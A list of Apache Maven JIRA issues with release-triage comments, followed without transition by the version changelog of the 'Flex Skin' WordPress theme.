- http://jira.codehaus.org/browse/MNG-2478 add filtered resource directories to super POM
- http://jira.codehaus.org/browse/MNG-5356 Make encrypt/decrypt logic pluggable
- http://jira.codehaus.org/browse/MNG-656 lazily resolve extensions
- http://jira.codehaus.org/browse/MNG-5366 [Regression] resolveAlways does not force dependency resolution in Maven 3.0.4
- http://jira.codehaus.org/browse/MNG-4622 Throw Validation Error if pom contains a dependency with two different versions.
- http://jira.codehaus.org/browse/MNG-683 Lifecycle mappings should specify phase bindings in terms of general functionality type
- http://jira.codehaus.org/browse/MNG-841 Support customization of default excludes
- http://jira.codehaus.org/browse/MNG-193 symmetry for outputs of a plugin
- http://jira.codehaus.org/browse/MNG-3695 Allow dependencies' scopes to be managed without explicit versions
- http://jira.codehaus.org/browse/MNG-3825 Dependencies with classifier should not always require a version.
- http://jira.codehaus.org/browse/MNG-3321 Skip plugin and/or execution
- http://jira.codehaus.org/browse/MNG-1569 Make build process info read-only to mojos, and provide mechanism for explicit out-params for mojos to declare
- http://jira.codehaus.org/browse/MNG-1867 deprecate system scope, analyse other use cases
- http://jira.codehaus.org/browse/MNG-4508 No way to avoid adding artifactId to site urls
- http://jira.codehaus.org/browse/MNG-2381 Improved control over the repositories in the POM. Unsure what the ask is here.
- http://jira.codehaus.org/browse/MNG-3474 Add parameter --internet to test Internet access with and without using proxy defined in settings.xml. Any takers... looks like a nice small feature to add.
- http://jira.codehaus.org/browse/MNG-2893 Update the DefaultPluginManager to not use a project depMan for controlling its transitive dependencies. Seems like a legitimate bug we should consider?
- http://jira.codehaus.org/browse/MNG-426 create "maxmem" setting for all plugins to refer to. I think this is now out of scope for core... but I would be interested in what others think.
- http://jira.codehaus.org/browse/MNG-3124 Inherit mailing lists from parent POM. Sounds like an issue building the internal model. Additionally this would not be a change that affects other consumers and their processing of dependencies, so this looks like a valid candidate to me.
- http://jira.codehaus.org/browse/MNG-2807 ciManagement from parent is not merging with children. Same as MNG-3124; both issues are related, it would seem.
- http://jira.codehaus.org/browse/MNG-4173 Remove automatic version resolution for POM plugins. This is somewhat reasonable, but we have already kicked this can down the road and it may hinder adoption. I would be happy to kick this one to 4.x on the basis that most existing poms were written with the assumption that you could avoid specifying the plugin version... and we even omit the plugin version in the asf parent pom for some stuff...
- http://jira.codehaus.org/browse/MNG-3092 Version ranges with non-snapshot bounds can contain snapshot versions. Do we have a decision as to what we will do with this one? It is one of the longest discussions we have...
- http://jira.codehaus.org/browse/MNG-5185 Improve "missing dependency" error message when _maven.repositories/_remote.repositories contains other repository ids than requested. The attached patch does not address the real issue, namely being able to define specific repo ids as offline. I would be happy to take a stab at the real issue, but likely do not have the time. If nobody else has the time, we should move this to 3.2.x as it could be a patch-level enhancement to the maven CLI options.
- http://jira.codehaus.org/browse/MNG-5378 Use m-s-u in core. ACTION: krosenv to provide status update.
- http://jira.codehaus.org/browse/MNG-5353 Ignore pre-releases in exclusive upper bound [lw,up). ACTION: jvzyl. Will we be upping Aether to M4, in which case that will expose an alternative version range syntax that resolves this issue... OTOH that new syntax may cause issues for existing pom readers... in which case this becomes a push back to 4.x.
- http://jira.codehaus.org/browse/MNG-5205 Memory leak in StringSearchModelInterpolator. ACTION: krosenv to provide status update.

Issues being worked on
- http://jira.codehaus.org/browse/MNG-5494 Add a license file that corresponds to each GAV in the distribution. I think jvzyl has this one under control. Can be pushed back if necessary, as what we have currently works, if somewhat sub-optimal.
- http://jira.codehaus.org/browse/MNG-3526 Small change to artifact version parsing. I have committed this issue.

Issues added to scope
- https://jira.codehaus.org/browse/MNG-5176 Print build times in an ISO 8601-style manner
Flex Skin Changelog

Version 1.4.1 (Released February 21, 2018)
- Hotfix to restore icon font

Version 1.4 (Released February 21, 2018)
- Added WooCommerce template and design support
- Added password
- Updated styling for Latest Posts area on Front Page template
- Updated CSS for Thesis 2.4+ data-handling changes

Version 1.3.1 (Released April 19, 2017)
- New Display Option to disable the prepended "Viewing:" found on archive pages.
- Fixed an issue with Front Page Featured Header changing all header overlays.
- #video-player Background Color has been set to Black (noticeable when setting the header to fixed width).
- Latest post title is now properly wrapped and its width no longer spans the full width of the page on desktop.

Version 1.3 (Released March 20, 2017)
- Added Video support to the Front Page Template
- Added specific Design options for the Call to Action area
- Redesigned the Front Page Template Latest Posts area
- Removed the Static Front Page Introduction Section in favor of the WordPress Post editor
- Added missing hooks to certain HTML containers
- Added /languages folder and .po file for translations
- Fixed an issue with encoded special characters breaking some sites with certain character sets
- Replaced special characters with HTML entity tags
- Removed the Flex option to enable Desktop menu in favor of always showing the desktop menu on desktops (previously you could have a mobile menu display on desktops)

Version 1.2 (Released June 27, 2016)
- Fixed an issue with Copyright being out of alignment when a start year is selected.
- Fixed an issue with some sub menu items being inaccessible when a menu has more than 2 tiers.
- Added an "always open" option to comments. (see Skin display options under comments)
- Added a border to the top of bylines on single posts.
- Added correct desktop spacing to pagination.
- Added an option to customize post image borders. (see Skin design options, Layout Settings, Fine-tune Fonts, and More and select Post Images)
- Added a filter to remove the comment bubble on the home/archive and single posts when comments are disabled for that post.
- Added an option to make no-sidebar pages full width. (see Skin display options > Pages)
- Added Sidebar Widget RSS styling.
- Suppressed border top for home page when not using a static front page.

Version 1.1.12 (Released June 15, 2016)
- Added an option to set No-Sidebar templates to full width content. (See Skin Content Display options > Misc)
- Added the missing placeholder images for Flex Videos embedded in posts/pages.

Version 1.1 (Released June 10, 2016)
- Video Support added to the Featured Image for single posts and pages, including custom templates (No Sidebar (Post), No Sidebar (Page) and Landing).
- Video Embed button added to TinyMCE Toolbar for adding Flex Videos which are optimized for performance.
- Call to Action can now be moved to the top or bottom via options.
- Call to Action post meta option now has an option to suppress on individual posts/pages.
- Option to change the copyright symbol to Creative Commons in the Copyright & Attribution box.
- Optional desktop menu added.
- Display options now have button style options.
- Display options added to customize notes, tips and alerts.
- LinkedIn added to the Social Follow Links.
- Option to limit the Front Page Header Image to the same width as your (Content + Sidebar) added.
- Display options added to Social Follow Links which allow you to display the social follow links in the Footer and/or Sidebar.
- No Sidebar Templates now split into two templates: one for Pages and one for Posts.
- Footer Social Links renamed to Social Follow Links.
- Flex Class system introduced.
- Header and Footer modified to take advantage of the new Flex Class system.
- Header and Footer elements are always vertically centered now.
- Logo 70px height restriction lifted.
- Editor Content Block titles are no longer Bold.
- No Sidebar Templates no longer center content.
- Added a thin shadow around post images.
- Fix: Editor Content Block no longer breaks when a title is not included. Previously it would have reverted the Block to the default style of a note.
- Fix: Comments now display only approved comments.